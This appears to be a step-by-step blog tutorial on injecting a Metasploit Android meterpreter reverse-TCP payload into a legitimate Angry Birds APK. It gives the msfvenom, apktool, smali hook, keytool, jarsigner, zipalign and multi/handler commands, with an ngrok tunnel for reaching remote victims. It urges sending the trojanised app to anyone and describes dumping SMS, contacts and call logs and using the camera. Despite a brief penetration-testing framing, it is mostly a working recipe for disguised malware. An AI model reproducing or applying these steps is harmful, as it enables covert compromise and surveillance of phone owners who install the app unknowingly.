It is possible to use a normal Android application as a payload in order to exploit any device. This test is important in every android security assessment as it would allow the penetration tester to discover if there are certain protections around the binary in place.
In this process, we are going to manually inject the payloads into Android applications using these tools:
NGrok
MSFVENOM
Metasploit
Apktool
Keytool
Jarsigner
Zipalign
First step is to download an APK file from apkmirror.com, i picked the Angry Birds game and downloaded the APK to my computer so we can inject the payload in it.
Next, we start ngrok to be able to star a port forwarding so we can send this payload to any one on the planet, and not just on local network:
./ngrok tcp 4444
Then we create the payload with Msfvenom and put the ip address and port from ngrok:
msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15827 R>fakebirds.apk
Now we should have two files in the same directory, the payload we created and the normal APK file:
Using the apktool command to extract the two apks:
Now inside the fakebirds folder navigate to fakebirds/smail/com and copy the Metasploit file to the other folder, the angrybirds folder:
Now back to the fakebirds folder, open the file AndroidManifest.xml and also open the same file from the angrybirds folder, and copy the highlighted part from the fakebirds file to the angrybirds file, the part which contain the user permissions:
Now the angrybirds file should look something like this:
Inside the file of the angrybirds (the real one) look for this line, this line is very important as it’s the first code that is executed when we run the application:
Where it says “android:name=”com.unity3d.player.UnityPlayerActivity” and now we need to find this path to reach this file and modify it, the path to this file is “/angrybirds/smali_classes2/com/unity3d/player” and open this file “UnityPlayerActivity.smali”
Inside the file make a search for “onCr”
And under this line copy and paste this line:
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
Save it and close the file.
Next, we’re going to create a Keystroe file to hold our password for the APK file:
keytool –genkey –keystore (path to the keystore file) –alias (any name) –keyalg RSA –keysize 2048 –validity 1000
After creating the keystore, we going to use apktool again, this time to create the apk file and after that to sign it:
apktool b angrybirds
Take a look at this path “/root/Downloads/angrybirds/dist/” where the new apk file is created:
Now to sign our apk with this command:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /root/key.keystore /root/Downloads/angrybirds/dist/angrybirds.apk hacker
You should see something like this message:
The final step is to use Zipalign to align our files into one final APK file which is the payload:
zipalign -v 4 /root/Downloads/angrybirds/dist/angrybirds.apk AngryBirds2.apk
And success.
Now copy this APK to the phone you want to test or upload it to some webpage or send it to anyone.
But one last step is to start a listening port with MSFCONSOLE:
use /multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit
Now as soon as the APK file is installed and opened, you will get a session back to your machine:
As we can see, the APK file looks like a legit file with the icon and size, even it will be installed without any problem or security issues:
The game started very normally and no problems at all, an we got a reverse shell back to our machine:
Write help and then you can see a long list of commands to chose from, where you can control the phone, dump SMS, contacts, phone logs and start any application on the phone, even you can take a photo from the back or front camera.
